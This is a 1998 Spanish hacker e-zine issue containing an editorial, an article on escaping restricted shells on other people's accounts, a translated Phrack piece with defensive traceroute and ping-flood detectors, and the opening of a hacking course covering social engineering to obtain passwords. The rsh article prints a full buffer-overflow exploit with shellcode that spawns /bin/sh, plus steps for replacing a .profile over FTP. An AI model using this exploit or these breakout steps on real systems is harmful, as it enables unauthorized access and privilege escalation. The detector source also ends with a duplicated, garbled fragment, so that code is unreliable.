
                   
               
                        Ļ
                                          Ŀ  
                                          ۳  
                                   Ĵ  
                            Ĵ۳Ŀ    
                            ĿĴ۳    
                            Ŀ۳J    
                          Ŀ۳۳J۳        
                          ۳۳F        
                                     
                                              
                           H A C K E R S  T E A M     
                               J O U R N A L          
                        Ĺ        
                             VOL. #1, N5, 1998.     
                        ļ


                 "LA PACIENCIA ES LA LLAVE DEL CONOCIMIENTO" 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     Nota: - J.J.F. / HACKERS TEAM - no se hace responsable del mal uso
           de la informacion aqui expuesta y tampoco tiene que estar
           de acuerdo con lo que sus colaboradores opinen.
           Tampoco esperamos que la gente use la informacion aqui expuesta
           para hacer dao ya que tan solo es con fines didacticos.
 
     Recomendado el uso del editor del MS-DOS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=          

     #CURRENT MEMBERS :

     - CONDE VAMPIRO     - CODER  H/P/V  EDITOR
     - MAC CRACK BISHOP  - CODER  C/P    WEBMASTER
     
     #WEB OFICIAL :

     - http://www.angelfire.com/mi/JJFHackers
     - http://jjfhackers.home.ml.org

     #E-MAIL OFICIAL :

     - jjf_team@usa.net      

     #LLAVE PGP OFICIAL :
     
     -----BEGIN PGP PUBLIC KEY BLOCK-----
     Version: 2.6.3ia

     mQCNAzVzXWwAAAEEALKaPtG7arRh4X0wUz16KP9/A6h4yhS5vcQ1QRx9TM7XV8w6
     BcIJjz8AIeldDCO5Jix8R7Sb/FO/Uco0f5Rnpd98ObsHANr9wRDwGqUCWpOGVZ6+
     ZhXEyfuDkzVl9MUxEVD1TyH08OGgdgRIKhCuPXY4C7W6Z+M0qVv0AX/CgliNAAUR
     tCNKSkYgSGFja2VycyBUZWFtIDxqamZfdGVhbUB1c2EubmV0PokAlQMFEDVzXW1b
     9AF/woJYjQEBlVwEAKgIdS0VA7qRuXMM7R4DtDcoz7We+vmHr/Mu+SvgsDkWRbBP
     IHhI5OJxPRfShAvLtUXlGoCA0DuUDxoq4x9j/yDJQvhBwzPw53uwNWLs6+iI31jk
     NCyv9h37hSfRTsRLq8hiQ3jqNWQO/i+O+c5RVr5gkSHdZF0lCvWI5NoSFnk0
     =Wu00
     -----END PGP PUBLIC KEY BLOCK-----
 
     #DISTRIBUIDORES OFICIALES DEL E-ZINE :

     - http://wakanda.islatortuga.com
     - http://underhack.islatortuga.com
     - http://teleline.es/persona/dep_blue 
     - http://members.xoom.com/baron_rojo/
     - http://oioio.dyn.ml.org

     #MIEMBRO OFICIAL (web ring) DE :

     - Black Angels
     - Spanish Underground Web Ring

     #COLABORADORES CON ESTE NUMERO :

     - CubikIce
     - Nobody
     - Estado Porcino (WKT)

     #SALUDOS :

     - Metalslug (Wakanda)
     - Schoddy Guy (Underhack)
     - Cheroky
     - Silicon Dragon
     - Paseante (SET) 
     - Dr Slump (oioio)

<>
<>
<>

  - INDICE.                                  

    TITULO                                        AUTOR
  \_______________________________/

  * EDITORIAL ................................ J.J.F. / HACKERS TEAM
  * HACK RSH (RESTRICTED SHELL) .............. NOBODY.
  * HERRAMIENTAS PARA USUARIOS DE LINUX
    (PARANOICOS?) ............................ CUBIKICE.
  * CURSO DE HACK V .......................... CONDE VAMPIRO.
  * COMO CRACKEAR NORTON CRASHGUARD
    DELUXE 3.0 ............................... ESTADO PORCINO.
  * UN POCO DE CULTURA: LIBROS ............... MAC CRACK
  * EL LECTOR OPINA .......................... VARIOS.
  * NOTICIAS UNDERGROUND ..................... J.J.F. / HACKERS TEAM

<>

<>

  -------------
   EDITORIAL 
  -------------

        Como siempre volvemos a la carga con un nuevo numero de vuestro ezine
  favorito que siempre trae suculentos articulos. Pero por lo visto en los
  mail's de nuestros lectores, se puede apreciar que muchos nos deciis que
  nos pasamos con las materias aqui tratadas, otros que quereis informacion
  underground con el unico fin de colaros en computadoras ajenas, esto
  seores mios!, es totalmente irracional. La filosofia de este ezine no se
  asemeja a esto ni por casualidad. Nosotros desde aqui lo unico que
  pretendemos es informar a la gente pero nunca con fines delictivos ni nada
  parecido, incluso estariamos encantados que los Administradores, expertos
  en seguridad, las autoridades, nos escriban articulos o sus opiniones, ya
  que este ezine esta pensado para todo el mundo.

        AVISAMOS, que la llave PGP que durante algunas semanas ha estado en
  la web disponible, ya NO es nuestra llave oficial, por eso os avisamos
  que nuestra llave oficial es esta que trae el ezine :) y tb la que esta
  ahora en el web.

        Por fin, como muchos lectores nos habian solicitado hemos puesto
  tanto en el web como en el ezine, nuestra llave publica, con el fin de
  aquellos que nos quieran decir algo mas confidencialmente lo puedan hacer
  sin ningun problema, como siempre mejoramos los servicios ;-) Ademas en
  este numero a los distribuidores oficiales se nos unen los de Oioio, ya
  conocidos en nuestro ezine :), pero este web solo esta disponible en
  ciertas ocasiones, que conste!!

        Con este numero termina nuestro primer volumen, el cual pensamos,
  que esta muy bien para la poca ayuda que recibimos por el momento, con
  permiso de un conocido politico que en un meeting dijo 'Menos aplausos y
  mas votos', yo digo 'Menos felicitaciones y mas articulos', esto solo
  intenta ser una reflexion entre los lectores, ya que este ezine lo hacemos
  todos no solo nosotros, siempre hay trabajo para todos.

        Deciros que ultimamente el USA.NET, el servidor donde nos enviais el
  correo no ha funcionado muy bien que digamos, por eso seguramente vuestros
  mail's no han llegado, por lo que simplemente nos vuelves a escribir y
  listos. Tambien deciros que procuramos que el web este siempre actualizado
  pero teneis que comprender que siempre se nos queda algun link antiquado,
  ya que el web es muy dinamico y hacemos lo que podemos, okis ?

        Bueno, chicos, ahora que ya estamos casi en verano, es hora de
  quitar el polvo a los ordenadores y hacer algo util en nuestras vidas, como
  por ejemplo investigar aquella cosa que te tiene tan intrigado y despues
  escribir un articulo sobre ello. Ahora ya no teneis excusa para trabajar
  un poco ;-)

        Que empieze lo bueno de una vez, pero no antes sin decirte que
  esperamos vuestros mail's con vuestras criticas, sugerencias, comentarios o
  cualquier cosa que nos quieras decir, y por supuesto vuestros actos de hack
  y tambien los programas que hayas creado para distribuirlos ;-), pues dicho
  todo lo que tenia que decir, escribe a:

  jjf_team@usa.net

        NOTA DEL WEBMASTER: Como ya habeis leido un poco mas arriba de esta
  editorial, los web los intento actualizar lo mas que puedo, ya se que hay
  de vez en cuando algunos links que no funcionan y que antes lo hacian,
  estoy en ello. Muchas veces esto pasa porque los servers a los que les he
  puesto el link se han caido, o estan de remodelacion. Una cosa que si
  quiero dejar clara, es que las web se actualizan periodicamente y los links
  se comprueban casi diariamente con el fin de que sigan funcionando perfec-
  tamente y a gusto de todos. Otra cosa, en vez de mandarme un mail diciendo
  que no funcionan los links (algunos) mejor, decirme cuales NO funcionan e
  intentare arreglarlos lo antes posible. Gracias. ;-)



                                                   - J.J.F. / HACKERS TEAM -
  
<>

<>
                                                                   15-05-1998.
                                                                    ????????

                      ()()()()()()()()()()()()()()()()()
                      ()  HACK RSH (RESTRICTED SHELL) ()
                      ()------------------------------()
                      ()          by Nobody           ()
                      ()()()()()()()()()()()()()()()()()

        Muchas veces cuando entramos en un shell ajeno, o sea en una cuenta
  de un servidor, nos encontramos con el famoso RSH 'restricted shell', que
  es un shell restringido, el cual es establecido por el administrador del
  sistema, para anular la ejecucion de comandos que pueden comprometer la
  seguridad del sistema, o incluso anulan el comando 'cd' para que no
  podemos salir de nuestro directorio de trabajo.

        Basicamente, lo que haremos aqui es explicar diferentes tecnicas,
  para poder saltarnos el rsh :), que conste que puede que estos metodos no
  funcionen, por lo que nos tendremos que espabilar y buscar nuevos metodos,
  solo teneis que poner a trabajar esa 'materia gris' que teneis por cabeza.

        Ahora lo mejor sera describir las restricciones que aplica el RSH,
  y como funciona. Estas restricciones son :

  - Los usuarios no pueden moverse de su directorio propio, ya que la orden
    'cd' esta descapacitada.

  - Los usuarios no puden cambiar el valor de la variable PATH, de modo que
    solo pueden ejecutar ordenes en el PATH que les proporciona el 
    administrador del sistema.

  - Los usuarios no pueden cambiar el valor de la variable SHELL.

  - Los usuarios no pueden ejecutar ordenes en directorios a los que 
    aparezcan en su PATH, ya que no pueden utilizar un nombre de orden que
    contegan una barra diagonal '/'.

  - Los usuarios no pueden redirigir la salida usando '>' o '>>'.	

  - Los usuarios no pueden utilizar ordenes exec.

        Como podemos ver el RSH, nos deja bastante limitados en el manejo del
  sistema. Estas restricciones se aplican cuando se ha ejecutado el .profile
  del usuario. El administrador debe preparar el fichero .profile, cambiando
  el propietario del fichero a root y ademas debe cambiar los permisos en el
  fichero para que nadie escriba en el mismo. El administrador define el
  PATH del usuario en el .profile de modo que el usuario solo pueda ejecutar
  comandos en su directorio especifico, generalmente se suele denominar
  /usr/rbin.

	En realidad el RSH suele ser el shell SH pero invocado mediante el
  parametro '-r'. La seguridad del RSH esta muy limitada ya que un hacker 
  puede quebrarlo y obtener un shell sin rectricciones, pero se suele usar
  bastante ya que nos librara de muchos que juegan a hackers ;-)

        Bueno, ya basta de teoria y empezemos con el juego. Como sabemos en
  cada directorio de los usuarios hay unos determinados ficheros, que sirven
  para configuraciones y a que podemos acceder, etc. Por ejemplo para ver
  estos ficheros que son ocultos ejecutamos en el prompt :

  $ ls -al
  total 14
  drwxr-xr-x   2 500     nobo      1024 May   7 20:18 .
  drwxr-xr-x   6 root    root      1024 May   7 16:05 ..
  -rw-r--r--   1 500     nobo      3768 Nov   7  1997 .Xdefaults
  -rw-r--r-T   1 root    root       143 May   7 14:52 .bash_history
  -rw-r--r--   1 500     nobo        24 Jul  14  1994 .bash_logout
  -rw-r--r--   1 500     nobo       220 Aug  23  1995 .bash_profile
  -rw-r--r--   1 500     nobo       124 Aug  23  1995 .bashrc
  -rw-rw-r--   1 500     nobo      3336 Oct  24  1997 .screenrc
  $

	Bueno, aqui tenemos un ejemplo de los ficheros ocultos que suelen
  tener los usuarios en sus directorios, los ficheros que nos interesan 
  para este caso seran el .profile, aqui como .bash_profile y el .login
  que aqui no esta presente, que suele estar en algunos sistemas.

        Que podamos saltarnos el RSH se debe al descuido de los
  administradores, ya que esta considerado peligroso dejar el .profile en el
  directorio del usuario, debido a que muchas veces podemos sustituir el
  .profile por uno que creemos y subirlo usando el FTP a la cuenta. Lo que
  tenemos que hacer es crear un .profile en nuestra maquina, despues lo
  subimos por FTP a la cuenta que nos interesa y por ultimo via Telnet
  conectamos a la cuenta y ya estaremos usando el .profile que hayamos
  insertado :). Esto se debe a que aunque el .profile sea de propiedad root
  se encuentra en el directorio del usuario, por esta razon el usuario o en
  nuestro caso, nosotros, podemos escribir en el .profile. Para ver que shell
  tenemos, basta que mirremos el etc/passwd que es un fichero de lectura
  publica, aunque este en shadow podemos ver la ubicacion de los directorios
  de los usuarios y los shell's asignados, esto lo haremos de la siguiente
  manera:

  $ vi /etc/passwd

	Facil!! ;-) Pues ya a estas alturas ya debemos haver anulado el RSH,
  pero para aquellos que tengan un administrador mas avispado, que utilizen
  el siguiente programa, el cual desborda la memoria.

------------ Codigo Fuente ---------------------------------------------------

/* 
  SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
  Created: 8/15/97

  Give thanks to Solar Designer for his su overflow, this is based
  on that peice of work.

  This is for educational purposes only, in no way am I responsible 
  for what you do with this.  This should be used by sys admins, or
  people who have permission of the admin to run it to see if this
  hole can exist on their system.  If you use it for the wrong reasons
  then I say *tisk* on you.  I will not be held responsible for your 
  actions.
  
  This could be done with a generic overflow program, but just
  running this is easier.
 
  USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
  MESSAGE ANYBODY ON IRC ABOUT THIS.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";
char *get_sp() {
   asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
  int i;
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;
  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));
  buffer[bufsize - 1] = 0;
  setenv("NLSPATH", buffer, 1);
  system("clear");
  printf("______________________________________________________________\n");
  printf("| RSH Overflow -- (c) shit-head 1997\n");
  printf("| Give props to Solar Designer for his su overflow, this is based
            on that.\n");
  printf("|\n");
  printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n");
  printf("|\n");
  printf("| *NOTE* I'm not responsible if you abuse this. Run only w/
            premission\n");
  printf("| Sending Overflow.... Done.\n");
  printf("--------------------------------------------------------------\n");
  execl("/usr/bin/rsh", "/usr/bin/rsh", NULL);
}

------------ FIN -------------------------------------------------------------

        Bueno, gente esto es todo por hoy y espero que os haya gustado el
  tema. Logicamente el RSH tiene mas truco pero no tiene gracia si os lo
  digo todo ;-)

  Y desde aqui saludar a toda la pea de #seguridad_informatica!!!!!

  Grupos como - J.J.F. / HACKERS TEAM - , CYBERHACK, WAKANDA, UNDERHACK,
  @pOkalypSYS, Oioio y todos los demas !!

  Y por supuesto : Bisho, Folixia, Fragel, Ipgh0st, Metalslug, Dillet,
  Riddle, Hadden, Guybrush, Tdp, Virux, Cy, Angelipas, Schoddy Guy, Xus,
  Enif, Bit-Quake, L.A., Nadia, Amanda, Case_zero, DrSlump, Prova, Marsuff,
  Meroka, Eli, Minister, ElCoronel, Daek, Cosmic, Net Bull, Profesor Falken,
  Icehouse y todos los que me dejo :)

                                                            NOBODY (c) 1998.

<>

<>

  No creo que haya que decir que todo esto es por mero interes educativo! 
  o si? :) 

  /////////////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ 
         [ Phrack Magazine Volume 7, Issue 5, Article 03 of 17] 


            Herramientas para usuarios de Linux (paranoicos?) 
            ------------------------------------------------- 

  por whynot AKA baldor 

  !!Se necesitan conocimientos basicos de TCP/IP para entender este articulo  

        Recientemente no solo el numero de ataques a servidores grandes o
  comerciales y maquinas con conexiones rapidas ha crecido, tambien muchos
  usuarios con conexion via telefonica han sido atacados o espiados. Un buen
  ejemplo es el programa winnuke.c que fue enviado a BugTraq y ha sido usado
  con exceso.

        Aqui, de lo que se trata no es de que sean lanzados hacia grandes
  servidores, sino de que pueden llegar a ser agobiantes si algun idiota
  intenta hackearte, para ralentizar tu conexion o tirar tu maquina. 

        Muchas distribuciones de Linux han reaccionado ante tal desarrollo y
  han hecho que sus daemons de telnet/ftp/otros logueen cualquier acceso. Por
  la misma razon puedes poner furiosas medidas de seguridad en tu
  /etc/hosts..deny. Pero en mi opinion hay un par de cosas que se olvidan de
  las que yo quisiera hablar aqui. 

  1. Detectando traceroutes. 

        Traceroute es un comando realmente poderoso que es normalmente usado
  para detectar donde y a que red esta conectado el ordenador que esta siendo 
  trazado. Por una serie de razones simplemente *no* puedes evitar que otra 
  persona te tracee, por eso lo mejor que puedes hacer es detectar *si*
  alguien te esta traceando o encontrar *quien* te esta traceando y
  confundirle un poco. 

  1.1 Como trabaja traceroute? 

        Basicamente traceroute envia unos paquetes IP/UDP de prueba al host 
  especificado. Para saber como es rutado el paquete (por que hosts esta  
  pasando) traceroute usa el campo TTL (Time To Live) de la cabecera IP. 
  El campo TTL especifica el limite superior de routers por los cuales pasa el 
  paquete hasta que se pierde. Cada router decrementa el valor de este campo 
  cuando llega el paquete en cuestion, hasta que llega a 0. Si esto ocurre 
  el router envia el mensaje ICMP TIME_EXCEED al host que enva el paquete. 

        Por eso la estrategia que traceroute usa para trazar la ruta de un
  paquete es enviar paquetes al host objetivo poniendole un valor que se
  incrementa (empezando con 1) en el campo TTL. Si un host envia el mensaje
  ICMP TIME_EXCEED traceroute muestra su direccion y el tiempo que ha pasado
  desde el envio del paquete de prueba IP/UDP hasta la recepcin del ICMP 
  TIME_EXCEED. Tras eso prepara un nuevo paquete de prueba con un TTL una 
  unidad mayor que el paquete anterior. 

        Traceroute sigue haciendo esto hasta que recibe un paquete ICMP 
  PORT_UNREACHABLE desde el ordenador objetivo, o hasta que llega al numero 
  maximo de hops (saltos) que le hayamos indicado (por defecto 30). 

        Para comprender todo esto deberiamos echarle un vistazo a la parte
  UDP del paquete que hemos hablado arriba. Para detectar que algo ha llegado
  al host objetivo y no enviar mas paquetes traceroute usa el protocolo UDP. 
  La parte UDP del paquete de prueba esta dirigida a un puerto que nunca, o
  muy raramente se usa (en los Unix mas modernos es 33434 mas el TTL incluido
  en el paquete IP). Como (normalmente) nada esta escuchando en el puerto
  33434 (o uno superior) el host objetivo envia una seal de ICMP
  PORT_UNREACHABLE que le indica a traceroute que ha encontrado al host
  objetivo y debe parar de enviar paquetes. 

        Teniendo en cuenta que la mecanica de traceroute es un poco compleja
  aqui tenemos un ejemplo un poco simplificado. Digamos que tu eres el host
  'source' y estas trazando tu ruta hacia el host 'target'

  source:/root # traceroute target
  traceroute to target (134.2.110.94), 30 hops max, 40 byte packets 

        Ahora 'source' enva un paquete de prueba al host 'target' (puerto
  33434) con un TTL de 1. El paquete pasa entonces por 'host_entremedio' y el
  router decrementa el TTL del paquete, descubre que el paquete ha "expirado"
  (TTL=0) y envia de vuelta un ICMP TIME_EXCEED a 'source'. Ahora traceroute
  usa la informacion incluida en este paquete para mostrar los datos del
  primer host por donde estan pasando los paquetes: 

  1 host_entremedio (142.45.23.1) 2.456 ms 

        'source' envia otro paquete de prueba, esta vez el TTL es 2 y el
  puerto es 33434+1 = 33435. Recibe otro paquete de vuelta ICMP TIME_EXCEED
  desde 'otro_host': 

  2 otro_host (142.45.10.1) 3.983 ms 

        La tercera prueba tiene el TTL puesto a 3 y es dirigida al puerto
  33436. Es ahora cuendo Traceroute recibe un ICMP PORT_UNREACHABLE desde
  'target':

  3 target (142.45.10.13) 4.032 ms 

        Ahi esta ! Traceroute ha terminado su trabajo y se finaliza. 

  source:/root # 

        Hay que decir que, por defecto, traceroute envia tres paquetes
  conteniendo el mismo TTL (cada paquete a un numero de puerto incrementado)
  para determinar el tiempo de respuesta de un host con mas exactitud. En
  realidad, traceroute nos muestra algo como esto: 

  traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 
  1 localhost (127.0.0.1) 1.983 ms 1.304 ms 0.934 ms 

  1.2 El funcionamiento del detector de traceroute. 

        Sabiendo como trabaja traceroute es muy facil detectarlo. Simplemente 
  pon tus sockets a escuchar en el puerto 33434 y superiores y reacciona 
  si recibes algun paquete. Puedes intentar adivinar con cuantos hops te 
  estan traceando restando 33434 al puerto donde has recibido el paquete y 
  dividiendo el resultado por 3. 

        Escuchar en el puerto por el que traceroute envia el paquete de prueba
  tiene un bonito efecto: no enviar de vuelta un paquete ICMP TIME_EXCEED ni
  una seal de ICMP PORT_UNREACHABLE. Obtendr un timeout por respuesta y
  pondra un * en la lista de hosts porque con un timeout traceroute *no*
  reconocer que ha pasado por su objetivo y continuar enviando paquetes de
  prueba hasta que el numero maximo de hops sea alcanzado. 

        Con el pequeo programa detecttr corriendo (y escuchando en los
  puertos 33434 - 33434*30*3) un traceroute a nuestro host apareceria asi: 

  schnecke:/root # traceroute localhost 
  traceroute to localhost (127.0.0.1), 30 hops max, 40 byte packets 
  1 * * * 
  2 * * * 
  . 
  . 
  . 
  30 * * * 

  1.3 Problemas detectando traceroutes. 

        El unico problema con la deteccion de traceroutes es que alguien
  puede especificar un numero de puerto distinto del que hay por defecto o
  usar otra tecnica. Nunca he visto a nadie hacer esto, asi que si el idiota
  de turno (o un wannabe cualquiera) te esta trazando tus posibilidades de 
  detectarlo son bastante altas. 

        Si eres *realmente* paranoico con los traceroutes no deberias usar
  los puertos para detectar un traceo pero puedes editar el fichero que
  maneja los paquetes UDP. El fichero es: /usr/src/linux/net/ipv4/udp.c 

        (NOTA: Este fichero es parte del kernel. Recompila el kernel para que
  los cambios tengan efecto) 

        Inserta la linea: 

  printk(KERN_INFO "UDP: packet sent to unreachable port by %s !\n",
  in_ntoa(daddr)); 

        Tras la linea 833: 

  ICMP_send(ski,ICMP_BEST_UNTEACH, ICMP_PORT_UNTEACH, 0, de); 

        Esto hara  que el sistema loguee *todas* las entradas a puertos que 
  no esten escuchando algo con el protocolo UDP. Hay que decir que el bonito 
  efecto descrito en el capitulo 1.2 no ocurriria (lo cual tambien podria ser 
  una ventaja). 

        BTW: Por favor, ten cuidado cuando edites el kernel - realmente lo
  necesitas :) 

  1.4 Un ejemplo de implementacion. 

  detecttr.c -> Mira al final de este fichero 

  2.Detectando pings. 

        Hubo un monton de discusion en los ultimos meses sobre ping porque ha
  sido usado con bastante frecuencia para transmitir gruesos paquetes a otros
  hosts que acabaron en crashes. A pesar de que este bug ha sido corregido en
  muchos hosts, el comando ping sigue siendo muy popular para ralentizar el
  modem de quienes estan en la Red, la conexion se les viene abajo debido a
  un GRAN lag.

        *No* puedes evitar que alguien te haga un ping (a no ser que tu ISP 
  bloquee todos los paquetes ICMP_ECHO hacia tu ordenador) y tampoco que ping 
  este aumentando el trafico en tu modem. Pero puedes detectar *quien* te ha 
  hecho un ping, determinar el tamao del paquete ping y decidirte a no 
  contestarle (esto *puede* reducir en 2 veces el ancho de banda de tu modem). 

  2.1 Como trabaja ping y como la gente ralentiza otras conexiones usando
      ping?

        Resumiendo, ping envia un paquete conteniendo un ICMP_ECHO y algunos
  datos mas al host objetivo el cual contestar con un paquete ICMP_ECHOREPLY
  que contiene, ademas, los datos enviados (solo se modifican unos pocos
  campos).

        Normalmente ping esperar un 1 segundo despues de enviar el siguiente 
  ICMP_ECHO. En muchas implementaciones de ping se puede pasar por alto este 
  segundo y hacer un 'floodping' que *no* esperar y enviar los paquetes tan 
  rapido como sea posible. Si eliges un tamao grande de paquete y tu
  conexion es rapida (T1 o Ethernet) esto causar un monton de trafico en el
  modem de tu victima y acabara ralentiza ndolo hasta desconectarlo. 

  2.2 Como puedo detectar un ping y como puedo evitar que me flodeen? 

        Como un ping no es mas que un ICMP_ECHO con algunos datos aadidos 
  simplemente puedes interceptarlo, extraer la direccion del que te lo envia 
  y el tamao del paquete y decidir si quieres responderle o no. Si el ping
  no es un flood-ping puedes reducir la cantidad de datos que transfieres
  desde tu modem simplemente no respondiendole. Pero si alguien te esta
  haciendo un floodping no te ayudar mucho el no responderle --> los paquetes
  ping probablemente estan causandote demasiado trafico y ralentizando tu
  conexion (mientras el host desde donde vienen los floodpings tenga una
  conexion lenta). Por lo menos siempre puedes darle una oportunidad... 

  2.3 Ejemplo de implementacion 

        El manejo del ICMP_ECHO le corresponde al kernel. Edita el fichero 
  /usr/src/linux/net/ipv4/icmp.c y busca la seccion 'Handle ICMP_ECHO'. 
  Estas 16 lineas de codigo son todo lo que necesitas modificar para
  defenderte contra/detectar los ping-floods. 

        Si sabes un poco de C podras ver que hay un define 
  "CONFIG_IP_IGNORE_ECHO_REQUESTS" que puedes usar para que el el kernel
  ignore todos ICMP ECHO_REQUESTs entrantes. Pero queremos ser mas selectivos. 
  Queremos hacer un log de todos los pings que envien a nuestra maquina.. Esto 
  lo haremos insertando la linea: 

  printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n",in_ntoa(saddr), 
  icmp_param.data_len); 

        tras el #endif. 

        Es facil cambiar la seccion "Handle ICMP_ECHO" asi tu ordenador 
  solo responder a los ICMP ECHO_REQUESTs que no sean muy voluminosos e
  ignorar los pings con paquetes de gran tamao.

  icmp.patch 
  static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct
  device
  *dev, __u32 saddr, __u32 daddr, int len) 
  { 
  #ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS 
  struct icmp_bxm icmp_param; 
  if (len <= 1000) { /* solo contestamos a los ping que lleven menos de 1k de 
                        datos */ 
  icmp_param.icmph=*icmph; 
  icmp_param.icmph.type=ICMP_ECHOREPLY; 
  icmp_param.data_ptr=(icmph+1); 
  icmp_param.data_len=len; 
  if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0) 
  icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos); 
  printk(KERN_INFO "ICMP: pinged by %s, packetsize = %d \n", 
  in_ntoa(saddr),icmp_param.data_len); 
  } 
  else 
  printk(KERN_INFO "ICMP: possible FLOOD DETECTED by %s, packetsize = %d \n", 
  in_ntoa(saddr),len ); 
  #endif 
  kfree_skb(skb, FREE_READ); 
  } 

------------ Codigo Fuente ---------------------------------------------------

detecttr.c 
/* 
* detecttr.c - by whynot AKA baldor (whynot@cyberjunkie.com) 
* creado el: 08.05.97 
* ultima modificacion: 11.07.97 
* Plataformas: Linux, FreeBSD, podria funcionar con otros sistemas POSIX 
* tambien. 
* 
* Compilacion: 
* usa "gcc -o detecttr detecttr.c" para GNU C y 
* "cc -o detecttr detecttr.c" para otros compiladores... 
* 
* Uso: 
* Ejecuta este programa al arrancar la maquina permanecer en background 
* hasta que alguien te haga un traceroute. Solo hace un *miserable* uso de 
* tu RAM y cerca de un 0% de uso de tu CPU :) 
* 
*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <errno.h> 
#include <string.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#include <sys/wait.h> 
#include <sys/time.h> 
#include <sys/signal.h> 
#include <sys/syslog.h> /* comenta esta linea si no tienes syslog.h */ 
#include <netdb.h> 


#define MAXBUFLEN 200 
#define MYPORT 33435 
#define NUMPORTS 30*3 

int sockfd[NUMPORTS]; 


void shutitdown() 
{ 

int w; 
char buf[50]; 
for (w=0; w<NUMPORTS; w++) 
close(sockfd); 
sprintf (buf,"DetectTraceroute terminado\n"); 
syslog(LOG_NOTICE , buf); 

exit(0); 
} 

char *getname (struct in_addr addr) 
{ 
struct hostent *h; 
int w; 
char foo[4]; /* los 4 numeros se usan como valores ASCII en un char */ 
int tmpint[4]; /* se usa para convertir un string en 4 numeros */ 
char tmpbuf[20]; 

sprintf(tmpbuf, "%s", inet_ntoa(addr)); 

if ( sscanf(tmpbuf,"%d.%d.%d.%d", &tmpint[0], &tmpint[1], &tmpint[2], 
&tmpint[3]) != 4) { 
printf ("Error detectando nombre de host !\n"); 
exit(1); 
} 

for(w=0; w<4; w++) foo[w]=tmpint[w]; 

if ( (h=gethostbyaddr(foo, 4, AF_INET)) == NULL) { 
herror("gethostbyaddr"); 
exit(1); 
} 
return h->h_name; 
} 

main(int argc, char *argv[]) 
{ 
int hops; 
struct sockaddr_in my_addr; 
struct sockaddr_in remote_addr; 
int addr_len, numbytes; 
char buf[MAXBUFLEN]; 
int w; 
fd_set readfds; 


if( fork() !=0 ) return(0); /* Si no queremos usar el &... */ 


signal(SIGHUP, SIG_IGN); /* ignorar SIGHUP */ 

signal(SIGTERM, shutitdown); /* shutdown limpio */ 

for(w=0; w<NUMPORTS; w++) { 

if ( (sockfd[w] = socket( AF_INET, SOCK_DGRAM, 0)) == -1) { 
perror("socket"); 
exit(1); 
} 
my_addr.sin_family = AF_INET; 
my_addr.sin_port = htons (MYPORT+w); 
my_addr.sin_addr.s_addr = htonl(INADDR_ANY); 

bzero(& (my_addr.sin_zero), 8); 

if ( bind (sockfd[w], (struct sockaddr *)&my_addr, sizeof (struct sockaddr) ) 
== -1) { 
perror("bind"); 
exit(1); 
} 
} 

FD_ZERO(&readfds); 
for(w=0; w<NUMPORTS; w++) 
FD_SET(sockfd[w], &readfds); 


sprintf (buf,"DetectTraceroute iniciado con exito\n"); 
syslog(LOG_NOTICE , buf); 

while(1) { 
select(sockfd[NUMPORTS-1]+1, &readfds, NULL, NULL, NULL); 

for (w=0; w < NUMPORTS; w++) { 
if (FD_ISSET(sockfd[w], &readfds)) 
hops = w; 
} 

addr_len = sizeof(struct sockaddr); 

if ((numbytes=recvfrom(sockfd[hops], buf, MAXBUFLEN, 0, (struct sockaddr 
*)&remote_addr, &addr_len)) == -1) { 
perror("recvfrom"); 
exit(1); 
} 

/* we use buf for misc stuff O:-) */ 
sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d", 
inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1); 
syslog(LOG_NOTICE , buf); 
FD_ZERO(&readfds); 
for(w=0; w<NUMPORTS; w++) 
FD_SET(sockfd[w], &readfds); 
} 
} 
} 

/* we use buf for misc stuff O:-) */ 
sprintf (buf,"TRACEROUTE desde IP %s. Host: %s HOPS: %d", 
inet_ntoa(remote_addr.sin_addr), getname(remote_addr.sin_addr), hops / 3 +1); 
syslog(LOG_NOTICE , buf); 
FD_ZERO(&readfds); 
for(w=3D0; w<NUMPORTS; w++) 
FD_SET(sockfd[w], &readfds); 
} 
} 

------------ FIN -------------------------------------------------------------

  Traducido por CubikIce -- cubikice@iname.com 

<>

<>

                              - CURSO DE HACK - 
                                  CHAPTER V

        Bueno, como ya se dijo en la Editorial este es el fin del primer
  volumen, por lo que creo que sera aconsejable en este numero, dar un
  repaso de las lecciones aprendidas. Ahora ya deberiamos tener una nocion
  basica de Hacking, pasando por la ingenieria social hasta un analisis de
  un server, pero para los que no les quedo claro, con lo expuesto aqui ya
  saldran de dudas y para aquellos que ya lo hayan aprendido pues un
  repaso no les vendra nada mal.

        Como vimos en el primer numero fue la ingenieria social, esto no
  creo que sea muy dificil de entender, basicamente consiste en hacernos
  pasar por otra persona con el fin de sacarle su login y password o algun
  tipo de informacion confidencial. Con el tiempo se ira cogiendo practica
